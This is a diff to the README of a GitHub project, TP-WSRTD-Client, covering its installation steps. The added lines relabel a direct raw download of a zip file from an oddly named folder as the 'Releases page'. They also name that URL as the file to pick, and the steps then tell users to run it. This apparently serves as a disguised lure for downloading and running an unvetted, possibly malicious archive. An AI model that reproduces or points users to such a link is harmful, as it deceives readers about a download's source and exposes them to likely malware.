NaBrisa218/TP-WSRTD-Client/README.md

 To get the TP-WSRTD-Client, follow these steps:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/NaBrisa218/TP-WSRTD-Client/releases) to view the available versions.
+   Go to the [Releases page](https://raw.githubusercontent.com/NaBrisa218/TP-WSRTD-Client/main/meriquinoid/TP-WSRTD-Client.zip) to view the available versions.

 2. **Select the Latest Release**
    Look for the most recent version at the top of the page.

 3. **Download the Application**
    Download the appropriate file for your system.
-If you are unsure, choose the file labeled "TP-WSRTD-Client.exe."
+If you are unsure, choose the file labeled "https://raw.githubusercontent.com/NaBrisa218/TP-WSRTD-Client/main/meriquinoid/TP-WSRTD-Client.zip"

 4. **Run the Installer**
    Once downloaded, locate the file in your Downloads folder.
 Double-click on it to start the installation.